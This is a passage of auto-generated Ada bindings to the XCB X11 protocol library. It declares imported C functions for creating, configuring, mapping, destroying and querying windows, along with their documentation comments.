upper-left corner. -- * -- * The created window is not yet displayed (mapped), call `xcb_map_window` to -- * display it. -- * -- * The created window will initially use the same cursor as its parent. -- * -- function xcb_create_window (c : access xcb.xcb_connection_t; depth : bits_stdint_uintn_h.uint8_t; wid : xcb_window_t; parent : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; border_width : bits_stdint_uintn_h.uint16_t; u_class : bits_stdint_uintn_h.uint16_t; visual : xcb_visualid_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5774 with Import => True, Convention => C, External_Name => "xcb_create_window"; --* -- * @brief Creates a window -- * -- * @param c The connection -- * @param depth Specifies the new window's depth (TODO: what unit?). -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the depth is taken from the -- * \a parent window. -- * @param wid The ID with which you will refer to the new window, created by -- * `xcb_generate_id`. -- * @param parent The parent window of the new window. -- * @param x The X coordinate of the new window. -- * @param y The Y coordinate of the new window. -- * @param width The width of the new window. -- * @param height The height of the new window. -- * @param border_width TODO: -- * \n -- * Must be zero if the `class` is `InputOnly` or a `xcb_match_error_t` occurs. -- * @param _class A bitmask of #xcb_window_class_t values. -- * @param _class \n -- * @param visual Specifies the id for the new window's visual. -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the visual is taken from the -- * \a parent window. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @return A cookie -- * -- * Creates an unmapped window as child of the specified \a parent window. A -- * CreateNotify event will be generated. The new window is placed on top in the -- * stacking order with respect to siblings. -- * -- * The coordinate system has the X axis horizontal and the Y axis vertical with -- * the origin [0, 0] at the upper-left corner. Coordinates are integral, in terms -- * of pixels, and coincide with pixel centers. Each window and pixmap has its own -- * coordinate system. For a window, the origin is inside the border at the inside, -- * upper-left corner. -- * -- * The created window is not yet displayed (mapped), call `xcb_map_window` to -- * display it. -- * -- * The created window will initially use the same cursor as its parent. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_window_aux_checked (c : access xcb.xcb_connection_t; depth : bits_stdint_uintn_h.uint8_t; wid : xcb_window_t; parent : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; border_width : bits_stdint_uintn_h.uint16_t; u_class : bits_stdint_uintn_h.uint16_t; visual : xcb_visualid_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_create_window_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5835 with Import => True, Convention => C, External_Name => "xcb_create_window_aux_checked"; --* -- * @brief Creates a window -- * -- * @param c The connection -- * @param depth Specifies the new window's depth (TODO: what unit?). -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the depth is taken from the -- * \a parent window. -- * @param wid The ID with which you will refer to the new window, created by -- * `xcb_generate_id`. -- * @param parent The parent window of the new window. -- * @param x The X coordinate of the new window. -- * @param y The Y coordinate of the new window. -- * @param width The width of the new window. -- * @param height The height of the new window. -- * @param border_width TODO: -- * \n -- * Must be zero if the `class` is `InputOnly` or a `xcb_match_error_t` occurs. -- * @param _class A bitmask of #xcb_window_class_t values. -- * @param _class \n -- * @param visual Specifies the id for the new window's visual. -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the visual is taken from the -- * \a parent window. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @return A cookie -- * -- * Creates an unmapped window as child of the specified \a parent window. A -- * CreateNotify event will be generated. The new window is placed on top in the -- * stacking order with respect to siblings. -- * -- * The coordinate system has the X axis horizontal and the Y axis vertical with -- * the origin [0, 0] at the upper-left corner. Coordinates are integral, in terms -- * of pixels, and coincide with pixel centers. Each window and pixmap has its own -- * coordinate system. For a window, the origin is inside the border at the inside, -- * upper-left corner. -- * -- * The created window is not yet displayed (mapped), call `xcb_map_window` to -- * display it. -- * -- * The created window will initially use the same cursor as its parent. -- * -- function xcb_create_window_aux (c : access xcb.xcb_connection_t; depth : bits_stdint_uintn_h.uint8_t; wid : xcb_window_t; parent : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; border_width : bits_stdint_uintn_h.uint16_t; u_class : bits_stdint_uintn_h.uint16_t; visual : xcb_visualid_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_create_window_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5893 with Import => True, Convention => C, External_Name => "xcb_create_window_aux"; function xcb_create_window_value_list (R : access constant xcb_create_window_request_t) return System.Address -- /usr/include/xcb/xproto.h:5908 with Import => True, Convention => C, External_Name => "xcb_create_window_value_list"; function xcb_change_window_attributes_value_list_serialize (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access constant xcb_change_window_attributes_value_list_t) return int -- /usr/include/xcb/xproto.h:5911 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_value_list_serialize"; function xcb_change_window_attributes_value_list_unpack (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access xcb_change_window_attributes_value_list_t) return int -- /usr/include/xcb/xproto.h:5916 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_value_list_unpack"; function xcb_change_window_attributes_value_list_sizeof (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:5921 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_value_list_sizeof"; function xcb_change_window_attributes_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5925 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_sizeof"; --* -- * @brief change window attributes -- * -- * @param c The connection -- * @param window The window to change. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @param value_mask \n -- * @param value_list Values for each of the attributes specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the attributes specified by \a value_mask for the specified \a window. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_window_attributes_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5946 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_checked"; --* -- * @brief change window attributes -- * -- * @param c The connection -- * @param window The window to change. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @param value_mask \n -- * @param value_list Values for each of the attributes specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the attributes specified by \a value_mask for the specified \a window. -- * -- function xcb_change_window_attributes (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5967 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes"; --* -- * @brief change window attributes -- * -- * @param c The connection -- * @param window The window to change. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @param value_mask \n -- * @param value_list Values for each of the attributes specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the attributes specified by \a value_mask for the specified \a window. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_window_attributes_aux_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_change_window_attributes_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5991 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_aux_checked"; --* -- * @brief change window attributes -- * -- * @param c The connection -- * @param window The window to change. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @param value_mask \n -- * @param value_list Values for each of the attributes specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the attributes specified by \a value_mask for the specified \a window. -- * -- function xcb_change_window_attributes_aux (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_change_window_attributes_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6012 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_aux"; function xcb_change_window_attributes_value_list (R : access constant xcb_change_window_attributes_request_t) return System.Address -- /usr/include/xcb/xproto.h:6018 with Import => True, Convention => C, External_Name => "xcb_change_window_attributes_value_list"; --* -- * @brief Gets window attributes -- * -- * @param c The connection -- * @param window The window to get the attributes from. -- * @return A cookie -- * -- * Gets the current attributes for the specified \a window. -- * -- function xcb_get_window_attributes (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_get_window_attributes_cookie_t -- /usr/include/xcb/xproto.h:6031 with Import => True, Convention => C, External_Name => "xcb_get_window_attributes"; --* -- * @brief Gets window attributes -- * -- * @param c The connection -- * @param window The window to get the attributes from. -- * @return A cookie -- * -- * Gets the current attributes for the specified \a window. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_window_attributes_unchecked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_get_window_attributes_cookie_t -- /usr/include/xcb/xproto.h:6048 with Import => True, Convention => C, External_Name => "xcb_get_window_attributes_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_window_attributes_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_window_attributes_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_window_attributes_cookie_t; e : System.Address) return access xcb_get_window_attributes_reply_t -- /usr/include/xcb/xproto.h:6066 with Import => True, Convention => C, External_Name => "xcb_get_window_attributes_reply"; --*< --* -- * @brief Destroys a window -- * -- * @param c The connection -- * @param window The window to destroy. -- * @return A cookie -- * -- * Destroys the specified window and all of its subwindows. A DestroyNotify event -- * is generated for each destroyed window (a DestroyNotify event is first generated -- * for any given window's inferiors). If the window was mapped, it will be -- * automatically unmapped before destroying. -- * -- * Calling DestroyWindow on the root window will do nothing. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_destroy_window_checked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6089 with Import => True, Convention => C, External_Name => "xcb_destroy_window_checked"; --* -- * @brief Destroys a window -- * -- * @param c The connection -- * @param window The window to destroy. -- * @return A cookie -- * -- * Destroys the specified window and all of its subwindows. A DestroyNotify event -- * is generated for each destroyed window (a DestroyNotify event is first generated -- * for any given window's inferiors). If the window was mapped, it will be -- * automatically unmapped before destroying. -- * -- * Calling DestroyWindow on the root window will do nothing. -- * -- function xcb_destroy_window (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6108 with Import => True, Convention => C, External_Name => "xcb_destroy_window"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_destroy_subwindows_checked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6123 with Import => True, Convention => C, External_Name => "xcb_destroy_subwindows_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_destroy_subwindows (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6135 with Import => True, Convention => C, External_Name => "xcb_destroy_subwindows"; --* -- * @brief Changes a client's save set -- * -- * @param c The connection -- * @param mode A bitmask of #xcb_set_mode_t values. -- * @param mode Insert to add the specified window to the save set or Delete to delete it from the save set. -- * @param window The window to add or delete to/from your save set. -- * @return A cookie -- * -- * TODO: explain what the save set is for. -- * -- * This function either adds or removes the specified window to the client's (your -- * application's) save set. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_save_set_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6157 with Import => True, Convention => C, External_Name => "xcb_change_save_set_checked"; --* -- * @brief Changes a client's save set -- * -- * @param c The connection -- * @param mode A bitmask of #xcb_set_mode_t values. -- * @param mode Insert to add the specified window to the save set or Delete to delete it from the save set. -- * @param window The window to add or delete to/from your save set. -- * @return A cookie -- * -- * TODO: explain what the save set is for. -- * -- * This function either adds or removes the specified window to the client's (your -- * application's) save set. -- * -- function xcb_change_save_set (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6177 with Import => True, Convention => C, External_Name => "xcb_change_save_set"; --* -- * @brief Reparents a window -- * -- * @param c The connection -- * @param window The window to reparent. -- * @param parent The new parent of the window. -- * @param x The X position of the window within its new parent. -- * @param y The Y position of the window within its new parent. -- * @return A cookie -- * -- * Makes the specified window a child of the specified parent window. If the -- * window is mapped, it will automatically be unmapped before reparenting and -- * re-mapped after reparenting. The window is placed in the stacking order on top -- * with respect to sibling windows. -- * -- * After reparenting, a ReparentNotify event is generated. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_reparent_window_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; parent : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6203 with Import => True, Convention => C, External_Name => "xcb_reparent_window_checked"; --* -- * @brief Reparents a window -- * -- * @param c The connection -- * @param window The window to reparent. -- * @param parent The new parent of the window. -- * @param x The X position of the window within its new parent. -- * @param y The Y position of the window within its new parent. -- * @return A cookie -- * -- * Makes the specified window a child of the specified parent window. If the -- * window is mapped, it will automatically be unmapped before reparenting and -- * re-mapped after reparenting. The window is placed in the stacking order on top -- * with respect to sibling windows. -- * -- * After reparenting, a ReparentNotify event is generated. -- * -- function xcb_reparent_window (c : access xcb.xcb_connection_t; window : xcb_window_t; parent : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6228 with Import => True, Convention => C, External_Name => "xcb_reparent_window"; --* -- * @brief Makes a window visible -- * -- * @param c The connection -- * @param window The window to make visible. -- * @return A cookie -- * -- * Maps the specified window. This means making the window visible (as long as its -- * parent is visible). -- * -- * This MapWindow request will be translated to a MapRequest request if a window -- * manager is running. The window manager then decides to either map the window or -- * not. Set the override-redirect window attribute to true if you want to bypass -- * this mechanism. -- * -- * If the window manager decides to map the window (or if no window manager is -- * running), a MapNotify event is generated. -- * -- * If the window becomes viewable and no earlier contents for it are remembered, -- * the X server tiles the window with its background. If the window's background -- * is undefined, the existing screen contents are not altered, and the X server -- * generates zero or more Expose events. -- * -- * If the window type is InputOutput, an Expose event will be generated when the -- * window becomes visible. The normal response to an Expose event should be to -- * repaint the window. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_map_window_checked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6266 with Import => True, Convention => C, External_Name => "xcb_map_window_checked"; --* -- * @brief Makes a window visible -- * -- * @param c The connection -- * @param window The window to make visible. -- * @return A cookie -- * -- * Maps the specified window. This means making the window visible (as long as its -- * parent is visible). -- * -- * This MapWindow request will be translated to a MapRequest request if a window -- * manager is running. The window manager then decides to either map the window or -- * not. Set the override-redirect window attribute to true if you want to bypass -- * this mechanism. -- * -- * If the window manager decides to map the window (or if no window manager is -- * running), a MapNotify event is generated. -- * -- * If the window becomes viewable and no earlier contents for it are remembered, -- * the X server tiles the window with its background. If the window's background -- * is undefined, the existing screen contents are not altered, and the X server -- * generates zero or more Expose events. -- * -- * If the window type is InputOutput, an Expose event will be generated when the -- * window becomes visible. The normal response to an Expose event should be to -- * repaint the window. -- * -- function xcb_map_window (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6298 with Import => True, Convention => C, External_Name => "xcb_map_window"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_map_subwindows_checked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6313 with Import => True, Convention => C, External_Name => "xcb_map_subwindows_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_map_subwindows (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6325 with Import => True, Convention => C, External_Name => "xcb_map_subwindows"; --* -- * @brief Makes a window invisible -- * -- * @param c The connection -- * @param window The window to make invisible. -- * @return A cookie -- * -- * Unmaps the specified window. This means making the window invisible (and all -- * its child windows). -- * -- * Unmapping a window leads to the `UnmapNotify` event being generated. Also, -- * `Expose` events are generated for formerly obscured windows. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_unmap_window_checked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6346 with Import => True, Convention => C, External_Name => "xcb_unmap_window_checked"; --* -- * @brief Makes a window invisible -- * -- * @param c The connection -- * @param window The window to make invisible. -- * @return A cookie -- * -- * Unmaps the specified window. This means making the window invisible (and all -- * its child windows). -- * -- * Unmapping a window leads to the `UnmapNotify` event being generated. Also, -- * `Expose` events are generated for formerly obscured windows. -- * -- function xcb_unmap_window (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6364 with Import => True, Convention => C, External_Name => "xcb_unmap_window"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_unmap_subwindows_checked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6379 with Import => True, Convention => C, External_Name => "xcb_unmap_subwindows_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_unmap_subwindows (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6391 with Import => True, Convention => C, External_Name => "xcb_unmap_subwindows"; function xcb_configure_window_value_list_serialize (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint16_t; u_aux : access constant xcb_configure_window_value_list_t) return int -- /usr/include/xcb/xproto.h:6395 with Import => True, Convention => C, External_Name => "xcb_configure_window_value_list_serialize"; function xcb_configure_window_value_list_unpack (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint16_t; u_aux : access xcb_configure_window_value_list_t) return int -- /usr/include/xcb/xproto.h:6400 with Import => True, Convention => C, External_Name => "xcb_configure_window_value_list_unpack"; function xcb_configure_window_value_list_sizeof (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint16_t) return int -- /usr/include/xcb/xproto.h:6405 with Import => True, Convention => C, External_Name => "xcb_configure_window_value_list_sizeof"; function xcb_configure_window_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:6409 with Import => True, Convention => C, External_Name => "xcb_configure_window_sizeof"; --* -- * @brief Configures window attributes -- * -- * @param c The connection -- * @param window The window to configure. -- * @param value_mask Bitmask of attributes to change. -- * @param value_list New values, corresponding to the attributes in value_mask. The order has to -- * correspond to the order of possible \a value_mask bits. See the example. -- * @return A cookie -- * -- * Configures a window's size, position, border width and stacking order. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_configure_window_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint16_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6428 with Import => True, Convention => C, External_Name => "xcb_configure_window_checked"; --* -- * @brief Configures window attributes -- * -- * @param c The connection -- * @param window The window to configure. -- * @param value_mask Bitmask of attributes to change. -- * @param value_list New values, corresponding to the attributes in value_mask. The order has to -- * correspond to the order of possible \a value_mask bits. See the example. -- * @return A cookie -- * -- * Configures a window's size, position, border width and stacking order. -- * -- function xcb_configure_window (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint16_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6447 with Import => True, Convention => C, External_Name => "xcb_configure_window"; --* -- * @brief Configures window attributes -- * -- * @param c The connection -- * @param window The window to configure. -- * @param value_mask Bitmask of attributes to change. -- * @param value_list New values, corresponding to the attributes in value_mask. The order has to -- * correspond to the order of possible \a value_mask bits. See the example. -- * @return A cookie -- * -- * Configures a window's size, position, border width and stacking order. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_configure_window_aux_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint16_t; value_list : access constant xcb_configure_window_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6469 with Import => True, Convention => C, External_Name => "xcb_configure_window_aux_checked"; --* -- * @brief Configures window attributes -- * -- * @param c The connection -- * @param window The window to configure. -- * @param value_mask Bitmask of attributes to change. -- * @param value_list New values, corresponding to the attributes in value_mask. The order has to -- * correspond to the order of possible \a value_mask bits. See the example. -- * @return A cookie -- * -- * Configures a window's size, position, border width and stacking order. -- * -- function xcb_configure_window_aux (c : access xcb.xcb_connection_t; window : xcb_window_t; value_mask : bits_stdint_uintn_h.uint16_t; value_list : access constant xcb_configure_window_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6488 with Import => True, Convention => C, External_Name => "xcb_configure_window_aux"; function xcb_configure_window_value_list (R : access constant xcb_configure_window_request_t) return System.Address -- /usr/include/xcb/xproto.h:6494 with Import => True, Convention => C, External_Name => "xcb_configure_window_value_list"; --* -- * @brief Change window stacking order -- * -- * @param c The connection -- * @param direction A bitmask of #xcb_circulate_t values. -- * @param direction \n -- * @param window The window to raise/lower (depending on \a direction). -- * @return A cookie -- * -- * If \a direction is `XCB_CIRCULATE_RAISE_LOWEST`, the lowest mapped child (if -- * any) will be raised to the top of the stack. -- * -- * If \a direction is `XCB_CIRCULATE_LOWER_HIGHEST`, the highest mapped child will -- * be lowered to the bottom of the stack. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_circulate_window_checked (c : access xcb.xcb_connection_t; direction : bits_stdint_uintn_h.uint8_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6516 with Import => True, Convention => C, External_Name => "xcb_circulate_window_checked"; --* -- * @brief Change window stacking order -- * -- * @param c The connection -- * @param direction A bitmask of #xcb_circulate_t values. -- * @param direction \n -- * @param window The window to raise/lower (depending on \a direction). -- * @return A cookie -- * -- * If \a direction is `XCB_CIRCULATE_RAISE_LOWEST`, the lowest mapped child (if -- * any) will be raised to the top of the stack. -- * -- * If \a direction is `XCB_CIRCULATE_LOWER_HIGHEST`, the highest mapped child will -- * be lowered to the bottom of the stack. -- * -- function xcb_circulate_window (c : access xcb.xcb_connection_t; direction : bits_stdint_uintn_h.uint8_t; window : xcb_window_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6537 with Import => True, Convention => C, External_Name => "xcb_circulate_window"; --* -- * @brief Get current window geometry -- * -- * @param c The connection -- * @param drawable The drawable (`Window` or `Pixmap`) of which the geometry will be received. -- * @return A cookie -- * -- * Gets the current geometry of the specified drawable (either `Window` or `Pixmap`). -- * -- function xcb_get_geometry (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t) return xcb_get_geometry_cookie_t -- /usr/include/xcb/xproto.h:6552 with Import => True, Convention => C, External_Name => "xcb_get_geometry"; --* -- * @brief Get current window geometry -- * -- * @param c The connection -- * @param drawable The drawable (`Window` or `Pixmap`) of which the geometry will be received. -- * @return A cookie -- * -- * Gets the current geometry of the specified drawable (either `Window` or `Pixmap`). -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_geometry_unchecked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t) return xcb_get_geometry_cookie_t -- /usr/include/xcb/xproto.h:6569 with Import => True, Convention => C, External_Name => "xcb_get_geometry_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_geometry_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_geometry_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_geometry_cookie_t; e : System.Address) return access xcb_get_geometry_reply_t -- /usr/include/xcb/xproto.h:6587 with Import => True, Convention => C, External_Name => "xcb_get_geometry_reply"; --*< function xcb_query_tree_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:6592 with Import => True, Convention => C, External_Name => "xcb_query_tree_sizeof"; --* -- * @brief query the window tree -- * -- * @param c The connection -- * @param window The \a window to query. -- * @return A cookie -- * -- * Gets the root window ID, parent window ID and list of children windows for the -- * specified \a window. The children are listed in bottom-to-top stacking order. -- * -- function xcb_query_tree (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_query_tree_cookie_t -- /usr/include/xcb/xproto.h:6606 with Import => True, Convention => C, External_Name => "xcb_query_tree"; --* -- * @brief query the window tree -- * -- * @param c The connection -- * @param window The \a window to query. -- * @return A cookie -- * -- * Gets the root window ID, parent window ID and list of children windows for the -- * specified \a window. The children are listed in bottom-to-top stacking order. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_tree_unchecked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_query_tree_cookie_t -- /usr/include/xcb/xproto.h:6624 with Import => True, Convention => C, External_Name => "xcb_query_tree_unchecked"; function xcb_query_tree_children (R : access constant xcb_query_tree_reply_t) return access xcb_window_t -- /usr/include/xcb/xproto.h:6628 with Import => True, Convention => C, External_Name => "xcb_query_tree_children"; function xcb_query_tree_children_length (R : access constant xcb_query_tree_reply_t) return int -- /usr/include/xcb/xproto.h:6631 with Import => True, Convention => C, External_Name => "xcb_query_tree_children_length"; function xcb_query_tree_children_end (R : access constant xcb_query_tree_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:6634 with Import => True, Convention => C, External_Name => "xcb_query_tree_children_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_tree_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_tree_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_tree_cookie_t; e : System.Address) return access xcb_query_tree_reply_t -- /usr/include/xcb/xproto.h:6651 with Import => True, Convention => C, External_Name => "xcb_query_tree_reply"; --*< function xcb_intern_atom_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:6656 with Import => True, Convention => C, External_Name => "xcb_intern_atom_sizeof"; --* -- * @brief Get atom identifier by name -- * -- * @param c The connection -- * @param only_if_exists Return a valid atom id only if the atom already exists. -- * @param name_len The length of the following \a name. -- * @param name The name of the atom. -- * @return A cookie -- * -- * Retrieves the identifier (xcb_atom_t TODO) for the atom with the specified -- * name. Atoms are used in protocols like EWMH, for example to store window titles -- * (`_NET_WM_NAME` atom) as property of a window. -- * -- * If \a only_if_exists is 0, the atom will be created if it does not already exist. -- * If \a only_if_exists is 1, `XCB_ATOM_NONE` will be returned if the atom does -- * not yet exist. -- * -- function xcb_intern_atom (c : access xcb.xcb_connection_t; only_if_exists : bits_stdint_uintn_h.uint8_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_intern_atom_cookie_t -- /usr/include/xcb/xproto.h:6677 with Import => True, Convention => C, External_Name => "xcb_intern_atom"; --* -- 